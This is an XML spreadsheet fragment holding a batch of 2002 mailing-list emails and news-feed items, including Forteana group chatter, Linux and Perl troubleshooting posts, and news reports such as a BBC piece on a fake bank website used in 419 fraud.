forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Anyone know what Quaoar means or stands for? Can't find it in the
&gt; dictionary. Scrabble players should be happy!
&gt;
http://www.angelfire.com/journal/cathbodua/Gods/Qgods.htmlQuaoar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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  &gt; Ok, but you'll still let me leave that black and white one there too,
&gt;&gt;  right? I like that one!!!
&gt;&gt;  --
&gt;&gt;
&gt;&gt;
&gt;&gt;  Fel
&gt;
&gt;Okay.  I see you like that 1940's starlet look then....
&gt;
&gt;I should think about a bio bit, but maybe I'll just remain enigmatic and
&gt;maintain my mystique*
&gt;
&gt;Helen of Troy
&gt;*by Lentheric :-)
&gt;
Or you could let me write one for you? Mind you ...... I know an 
awful lot about you! ;-))Yes, I like that starlet look, but I think you should come out from 
behind that bike too and let us see what you are wearing.  looks 
pretty innerestin'
-- 
Fel
NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Or you could let me write one for you? Mind you ...... I know an
&gt; awful lot about you! ;-))Oh, that could be interesting!&gt;
&gt; Yes, I like that starlet look, but I think you should come out from
&gt; behind that bike too and let us see what you are wearing.  looks
&gt; pretty innerestin'That bike is all that's between me and my modesty.  The other photos are not
for public consumption. :-)&gt; FelHelen of Troy
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home for Top $
http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Just the headlines and URLs so I don't bore y'all too much....http://www.guardian.co.uk/Iraq/Story/0,2763,805900,00.htmlAs a US Republican, I reject George Bush's illegal and
unconstitutional plan to attack Iraq - Scott Ritter
http://jang.com.pk/thenews/oct2002-daily/07-10-2002/world/w9.htmSaudi Arabia may start fingerprinting Americans
Blair warned war to oust Saddam 'illegal'------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Home Selling? Try Us!
http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
Using Razor2 via SpamAssasin.System is Solaris 2.7, with qmail. Spamassassin run via user's procmail.
All users who use SA have run razor-register.Razor2 is failing, and I can't find anything in the limited docs or on 
google on it,
and I'm hoping someone can help.The error (which doesn't prevent SA from working) is:Oct  2 06:38:22 sancho2 qmail: 1033565902.186041 delivery 4588: success: 
razor2_check_skipped:_Bad_file_number_Can't_locate_object_m
ethod_"new"_via_package_"Razor2::Client::Agent"_(perhaps_you_forgot_to_load_"Razor2::Client::Agent"?)_at_/usr/local/lib/perl5/site_p
erl/5.6.1/Mail/SpamAssassin/Dns.pm_line_374./did_0+0+1/Looking at Dns.pm doesn't really help me, and Razor2::Client::Agent appears 
to be in the right place,
in /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client.Ideas?...Chris
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Even better:http://www.ridiculopathy.com/news_detail.php?id=668White House: President's "War Boner" Must Be Satisfied..."The President can't seem to hide his excitement about a possible
military conflict with Iraq. At a recent function honoring America's
war widows, Bush sported a visible erection when his speech turned to
the subject of the Middle East.'Believe me when I say this. With or without the help of other
nations, with or without UN approval, we will penetrate Iraq's
borders. With overwhelming force, we will pound Iraq over and over
again without ceasing. And, once its leaders concede defeat, we will
seed Iraq with American-style democracy.'Aides say the podium was scrubbed down thoroughly after the event with
a special cleanser/biocide not used since the Clinton
administration.".....------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Tom R:
&gt; http://www.cliktrik.com/people/family/me/0419.jpg
&gt; 
Which one's you?TimC------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>what takes time and money: noting the amounts of each correction and basing
the refund delivery method on the amount.  yesh, it's silly to spend $.37 (+
labor and materials) for a $.02 refund, but maybe the only alternative right
now is to create dichotomies that require even more time and labor - or keep
the money (see john hall below).  your mailed refund is a function of bulk.in jax we're on the verge of firing at&amp;t cable for horrible customer service
and over-charging.  what will probably happen: if the amount of overage per
customer is significant (say $30 or more) the refund will go directly to the
customer.  If it's less, the combined total amount will go to the city as
lump sum settlement.in your case, maybe all the customers could vote on line where they'd like
their lump sum to go.  of courese, they'd have to be notified by mail first.
:-)-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Hall
Sent: Monday, October 07, 2002 5:02 PM
To: Fork@xent.com
Subject: RE: The absurdities of life.
They are legally required to do that.  I got a similar check because an
insurance company didn't pay a claim quickly enough.  It might have been
$.02.Although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</si>
  <si>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 xml:space="preserve">use Perl Daily Headline MailerThis Week on perl5-porters (30 September / 6 October 2002)
    posted by rafael on Monday October 07, @07:12 (summaries)
    http://use.perl.org/article.pl?sid=02/10/07/1124226RATS
    posted by KM on Monday October 07, @09:01 (news)
    http://use.perl.org/article.pl?sid=02/10/07/132252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</si>
  <si>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This Week on perl5-porters (30 September / 6 October 2002)
    * RATS+--------------------------------------------------------------------+
| This Week on perl5-porters (30 September / 6 October 2002)         |
|   posted by rafael on Monday October 07, @07:12 (summaries)        |
|   http://use.perl.org/article.pl?sid=02/10/07/1124226              |
+--------------------------------------------------------------------+It was a busy week indeed, with long threads, interesting bugs, clever
fixes, miscellaneous optimizations, some new ideas, a few jokes,
mysterious failures, and, finally, a security hole. Read on.This story continues at:
    http://use.perl.org/article.pl?sid=02/10/07/1124226Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/07/1124226
+--------------------------------------------------------------------+
| RATS                                                               |
|   posted by KM on Monday October 07, @09:01 (news)                 |
|   http://use.perl.org/article.pl?sid=02/10/07/132252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Perl.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/07/132252Links:
    0. http://www.securesoftware.com/rats.phpCopyright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</si>
  <si>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&gt;Benoit claimed the prize for his size 14 feet. In the female division of the
&gt;competition, three women tied for first place with size 10 feet.
&gt;Winners took home a $100 gift certificate to either Footlocker or Barrie
&gt;Ltd.Well crap, mine are size 11.&gt;
&gt;"If I'd have known the contest was happening, I would have gone," said
&gt;Justin Simon '04, the proud owner of size 15 feet. "A lot of the guys have
&gt;bigger feet than that. Dexter Upshaw ['06] wears a size 18."
&gt;
&gt;Simon said the $100 gift certificate would have almost paid for a new pair
&gt;of shoes.Almost. If you shop at Payless!!But sure could have used the $100 anyway!
-- 
Fel
NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Home Selling? Try Us!
http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Helen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http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;I managed to get myself an iMac yesterday (just a G3 but a good'un) and was
&gt;wondering if any of the Apple people on here could recommend a good ISP (for
&gt;narrow band at the moment) for getting online under OS X.
&gt;
&gt;Stewmy local ISP works great with my iMac. I don't know what you guys 
have over there, but OS X ought to let you get online as well as 
anything else.Crossing my fingers though....I did a upgrade to Jaguar, and ended up 
doing a scrape and install after that. Oh, and I am on 56k dialup
-- 
Fel
NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Home Selling? Try Us!
http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  &gt;Tom R:
&gt;&gt;&gt;  
&gt;&gt;&gt;http://www.cliktrik.com/people/family/me/0419.jpg
&gt;&gt;&gt;
&gt;&gt;Which one's you?
&gt;
&gt;I'm actually taking the photo -- both figures are in fact waxworks.
&gt;
&gt;This was in Mme Tussaud's in, of all places, Sydney Australia.
&gt;
&gt;       /t
&gt;--damn it Tom!! I had my kids believing you knew Albert Einstein!!Well, until the smart one asked just how old you were now.
-- 
Fel
NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;That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&gt;&gt;http://www.frogstone.net/Cafe/CafeForteana.html
&gt;
&gt;Maybe a kind soul with access to that issue and a scanner could scan it and
&gt;forward to you.
&gt;
&gt;Terry
&gt;I would appreciate that very much as I won't be getting back to 
Washington until December.
-- 
Fel
NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">HiI try to rebuild xine from src package and I get these errors:.
.
.
.
.
Finding  Provides: /usr/lib/rpm/find-provides
Finding  Requires: /usr/lib/rpm/find-requires
PreReq: rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 
rpmlib(CompressedFileNames) &lt;= 3.0.4-1
Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 
rpmlib(CompressedFileNames) &lt;= 3.0.4-1
Requires: xine-libs = 0.9.13 /bin/sh
Obsoletes: xine-devel
RPM build errors:
    user dude does not exist - using root
    user dude does not exist - using root
    user dude does not exist - using root
    user dude does not exist - using root
    user dude does not exist - using root
    File not found: /var/tmp/xine-root/usr/bin/aaxine
thx,
Roi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#teach_a_man_to_fish
Date: 2002-10-08T00:22:08-05:00_Kevin Hemenway_: Finding More Channels[1]. â€œIn simple terms, there are 
thousands of web sites that are actively providing their news and headlines in 
a format AmphetaDesk can understand [RSS]. And while AmphetaDesk knows about a 
good number of these sites, it'd be impossible to hunt down each and every 
single possibility. So, this page is here to teach you how to fish.â€[1] http://www.disobey.com/amphetadesk/finding_more.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000643
Date: 2002-10-07T21:35:22-06:00Yahoo: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boss.[1] http://story.news.yahoo.com/news?tmpl=story2&amp;cid=127&amp;u=/020927/7/2bxul.html&amp;printer=1
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537486
Date: Not suppliedSteve sez: "It's tragic when life imitates Wile E. Coyote cartoons. Guy 
boobytraps his house to get his family if they try to break in, and seemingly 
is killed himself by his own traps." Link[1] Discuss[2] (_Thanks, Steve[3]!_)[1] http://story.news.yahoo.com/news?tmpl=story2&amp;cid=573&amp;ncid=757&amp;e=2&amp;u=/nm/20021007/od_nm/boobytraps_dc
[2] http://www.quicktopic.com/boing/H/K9nShVkkrRxi
[3] http://www.portigal.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537496
Date: Not suppliedCurcumin, the chemical that makes curry yellow, turns out to be a good compound 
for treating radiation burns resulting from cancer therapy. Link[1] Discuss[2] 
(_Thanks, Cheryl!_)[1] http://www.alertnet.org/thenews/newsdesk/N07347915
[2] http://www.quicktopic.com/boing/H/THKNJnrnHdDd
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85535421
Date: Not suppliedA Nintendo newsletter from 1987 is going for ober $700 on eBay. Link[1] Discuss
[2] _(Thanks, Billy Hayes!)_[1] http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=1566539449&amp;rd=1
[2] http://www.quicktopic.com/16/H/wUzqZdX42Az
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534328
Date: Not suppliedThe new Neiman Marcus Christmas catalog is out (in October!), including 
you-as-an-action-figure ($7,500), a bamboo hut ($15,000) and a leather frisbee 
($30). Link[1] Discuss[2][1] http://www.neimanmarcus.com/store/sitelets/christmasbook2002/fc.htm?navAction=jump&amp;promo=home2
[2] http://www.quicktopic.com/boing/H/sWabFeGyB5u4C
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655706,215/
Date: 2002-10-08T03:31:00+01:00BBC reporter Donal MacIntyre wins high profile libel case against police.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655710,215/
Date: 2002-10-08T03:30:56+01:00*World latest: *Hundreds of Palestinians vent their anger as dozens of Israeli 
tanks withdrew after a gruelling three-hour raid on the Gaza strip.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655713,215/
Date: 2002-10-08T03:30:53+01:00*Afghanistan: *In his final report one year from the beginning of the US 
campaign *Rory McCarthy* finds mounting anger at the military presence.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8640496,1440/
Date: Not suppliedThe largest object found since 1930 is half the size of Pluto, and calls that 
object's planetary status into question
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8643939,1440/
Date: Not suppliedWorld chess champion Vladimir Kramnik takes the lead over the computer Deep 
Fritz, after the machine makes a peculiar mistake
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8639021,1440/
Date: Not suppliedA new Japanese system allows palmtop computers to swap large amounts of data 
when their owners shake hands
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8639022,1440/
Date: Not suppliedThe medicine prize goes to research that revealed how cell suicide sculpts the 
body and - when disrupted - causes disease
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Brendan Kehoe (brendan@zen.org):&gt; As a workaround, the various distributions could use a GPG singature
&gt; to verify correctness of the file.  Since the distributor's secret key
&gt; is required to create that signature, it would add a pretty
&gt; significant step that would have to be taken to make it possible to
&gt; replace both a rpm or apt file and its accompanying signature.There are complex problems inherent in attempts to implement this.
http://linuxmafia.com/~rick/linux-info/debian-package-signing-- 
Cheers,                        My pid is Inigo Montoya.  You kill -9    
Rick Moen                      my parent process.  Prepare to vi.
rick@linuxmafia.com
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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signature.Check your local friendly Red Hat installation:[root@localhost up2date]# rpm --checksig zsh-4.0.2-2.src.rpm
zsh-4.0.2-2.src.rpm: md5 gpg okOf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yet.Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the info AJ, I found "weblog" at 
http://awsd.com/scripts/weblog/index.shtml which has some click-path 
reporting. It's simple, but works. Report generation takes a bit though, even 
with dns resolution turned off..Donncha.
On Monday 07 October 2002 23:35, AJ McKee wrote:
&gt; Donncha,
&gt;
&gt; I've been using mod_usertrack for a good while now. I use in by default in
&gt; every vhost that I set up. I assign a cookie name and set the expiry for
&gt; about a year. I have to say it looks ok. A few things to note though. If a
_______________________________________________
Webdev mailing list
Webdev@linux.ie
http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the BBC website - www.bbc.co.uk Tuesday, 8 October, 2002, 09:43 GMT 10:43 UK  Fake bank website cons victims
 West African criminals have used a fake version of a British bank's online
 service to milk victims of cash, say police. The fake site was used to squeeze
 more money out of people they had already hooked. 
 The site has been shut down. But UK National Criminal Intelligence Service,
 (NCIS), said at least two Canadians had lost more than $100,000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bank's name. 
 "I have seen the microsite myself and it's very sophisticated," said the NCIS
 spokesman. "It's very convincing especially to people not very experienced
 online." 
 Once the con was discovered it was quickly shut down. However, the people
 behind it have not been caught. 
 NCIS does know that at least two people have lost more than $100,000. 
 The bank involved has bought up the domain used in the con as well as many
 other permutations of its name to limit the chance it could happen again.  Domain games 
 Usually people are first hooked in to what has become known as Advanced Fee or
 419 fraud by replying to an unsolicited fax or e-mail offering a share of any
 cash successfully moved out of Africa. 
 The '419'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country's national bank. 
 Typically, victims are given a login name and password and are encouraged to
 visit the site so they can see that the cash they are getting a share of has
 been deposited in their name. 
 But before they can get their hands on the cash, the victims are typically
 asked to hand over more of their own money to help the transfer go ahead. 
 Once the South African police discovered the ruse they declared it a national
 priority crime and soon arrested the 18 people behind it. 
 Modern gloss 
 An briefing paper prepared by NCIS in August on organised crime noted that
 criminals were increasingly turning to the web to lure new victims and give
 old cons a modern gloss. 
 The NCIS spokesman urged people who have fallen victim to 419 fraud to come
 forward and help it track down the perpetrators. He said in the last two
 months it had arrested 24 people overseas involved with this type of fraud. 
 He said any e-mail, fax or letter making an offer that looks to good too be
 true, undoubtedly is. 
 One of the first companies to fall victim to website spoofing was net payment
 service Paypal. 
 Conmen set up a fake site and asked people to visit and re-enter their account
 and credit card details because Paypal had lost the information. 
 The website link included in the e-mail looked legitimate but in fact directed
 people to a fake domain that gathered details for the conmen's personal use. 
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home for Top $
http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/entertainment/showbiz/2308581.stmTuesday, 8 October, 2002, 07:55 GMT 08:55 UK
Lennon killer seeks parole againThe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Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very
&gt;large company are making a loss on it and:
&gt;
&gt;http://xbox-linux.sourceforge.net/articles.php?aid=1âŠ‚=Press%20Release%3A%20Xbox%20Linux%20Mandrake%209%20Released
&gt;
&gt;Mandrake has been released for it.isn't it Â¤250 in Smyths?don't forget to add to that the modchip, and the time to put it on.(/me thinks unless you want 3d graphics, www.mini-itx.com is the way to go :))L.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/religion/Story/0,2763,806744,00.htmlEvangelicals' threat to new archbishopDirect action threat over liberal views on sexualityStephen Bates, religious affairs correspondent
Tuesday October 8, 2002
The GuardianEvangelical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or even demonstrations at services where Dr Williams
is present.
Church of England bishops, who have hitherto largely kept their heads down
during the row, are meeting next week to discuss their response to the
evangelical extremists' challenge, which appears to have grown in the
absence of a robust rebuttal.
A letter by senior theologians in today's Guardian, however, repudiates the
evangelicals' tactics, calling them unseemly and contrary to biblical
teaching.
On the BBC's Thought for the Day yesterday, Angela Tilby, vice-principal of
Westcott House, Cambridge, accused Dr Williams's opponents of presumption
and blackmail. "It is in fact a thoroughly aggressive way to behave. It is
attempting to force an issue by emotional violence... manipulating to get
your way is often preferable to painstaking negotiation," she said.
Last week, Dr Williams said he was deeply saddened. "Matters of sexuality
should not have the priority or centrality that Reform and the Church
Society have tried to give them. The archbishop cannot withdraw his
appointment since so many, including evangelicals, have urged him to take
the post... the archbishop believes it to be his duty under God."
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/climatechange/story/0,12374,806695,00.htmlWeevil pest warms to life in south-west LondonJames Meek, science correspondent
Tuesday October 8, 2002
The GuardianThey're chomping in Chelsea, Fulham and Pimlico, but despite their fancy
taste in London addresses they are neither posh nor particularly fussy: they
are vine weevils and they want to eat your plants.
Two species of vine weevil previously unable to survive Britain's cold
winters have been discovered in south-west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"It's very likely
these weevils have been introduced to Britain through imported ornamental
plants from Italy," said Dr Barclay. "It looks like they're here to stay."
He found otiorhynchus armadillo on the window of a Chelsea department store
in 1998, but as the shop sold imported house plants, he assumed it was a
migrant. It has now quietly become the most common species of vine weevil in
south-west London. The second invader is not so numerous, but has
established itself firmly in the same area.
Apart from laurels, vine weevils attack bay, viburnum, ornamental ivy, and
grape vines. An early sign of trouble is that notches appear in leaves. The
soil-dwelling larvae bite the roots off below the surface.
One possible explanation for the invaders' successful colonisation of
Britain is global warming. Earlier springs and milder winters are already a
fact.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Nobel Honors 3 for Astrophysics Work Tuesday October 8, 2002 12:00 PM
STOCKHOLM, Sweden (AP) - Two Americans and a Japanese won the Nobel Prize in
physics Tuesday for using some of the most obscure particles and waves in
nature to understand the workings of astronomy's grandest wonders.
Riccardo Giacconi, 71, of the Associated Universities Inc. in Washington,
D.C., will get half of the $1 million prize for his role in ``pioneering
contributions to astrophysics, which have led to the discovery of cosmic
X-ray sources.''
Raymond Davis, Jr., 87, of the University of Pennsylvania shares the other
half of the prize with Japanese scientist Masatoshi Koshiba, 76, of the
University of Tokyo. The two men pioneered the construction of giant
underground chambers to detect neutrinos, elusive particles that stream from
the sun by the billion.
Neutrinos offer an unparalleled view of the sun's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Italian-born Giacconi, a U.S. citizen, was awarded half of the prize for
building the first X-ray telescopes that provided ``completely new - and
sharp - images of the universe,'' the academy said.
His research laid the foundation for X-ray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year's Nobel awards started Monday with the naming of Britons Sydney
Brenner, 75, and Sir John E. Sulston, 60, and American H. Robert Horvitz,
55,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 the only one not awarded in Sweden -
will be announced Friday in Oslo, Norway.
The award committees make their decisions in deep secrecy and candidates are
not publicly revealed for 50 years.
Alfred Nobel, the wealthy Swedish industrialist and inventor of dynamite who
endowed the prizes left only vague guidelines for the selection committees.
In his will he said the prize being revealed on Tuesday should be given to
those who ``shall have conferred the greatest benefit on mankind'' and
``shall have made the most important discovery or invention within the field
of physics.''
The Royal Swedish Academy of Sciences, which also chooses the chemistry and
economics winners, invited nominations from previous recipients and experts
in the fields before cutting down its choices. Deliberations are conducted
in strict secrecy.
The prizes are presented on Dec. 10, the anniversary of Nobel's death in
1896, in Stockholm and in Oslo.
---
On the Net:
Nobel site, http://www.nobel.se ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/international/story/0,3604,806579,00.htmlLioness adopts fifth antelopeRory Carroll, Africa correspondent
Tuesday October 8, 2002
The GuardianKamuniak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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ananova:Â  
Dracula theme park could be switched to BucharestA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Dracula's castle and an artificial lake.
The project has also been objected to by the world heritage organisation
Unesco fearing Sigishoara might be spoilt.
PricewaterhouseCoopers is to present its final report on the project on
October 15.
Story filed: 13:16 Tuesday 8th October 2002------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ananova:Â  
Newspaper's readers complain over 'let's have sex' picture captionReaders of an African newspaper have complained after a picture caption
about jewellery contained the words "let's have sex".
The mix-up highlights the problems caused by the wide range of languages
spoken in Namibia.
Callers to the Namibian were angered by the use of the word tulumweni, which
translates roughly as "let's have intercourse" in the Oshiwambo language.
It was used in a caption concerning people in the Caprivi who use rings from
the femidon - female condom - as jewellery.
According to the The Namibian , an activist involved in care for Aids/HIV
patients spelt the word tulumweni for the journalist.
He intended it to mean "you will see for yourselves" in the Siyeyi tongue.
One caller said the complainants "should be considerate of other people's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double-meaning is tulikunde, which in Oshiwambo
translates as let's talk, but which in Sisubiya translates as let's have
intercourse.
The Herero word for a hat is ekoli, which is an Oshiwambo word for a vagina.
Story filed: 12:37 Tuesday 8th October 2002------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">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Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
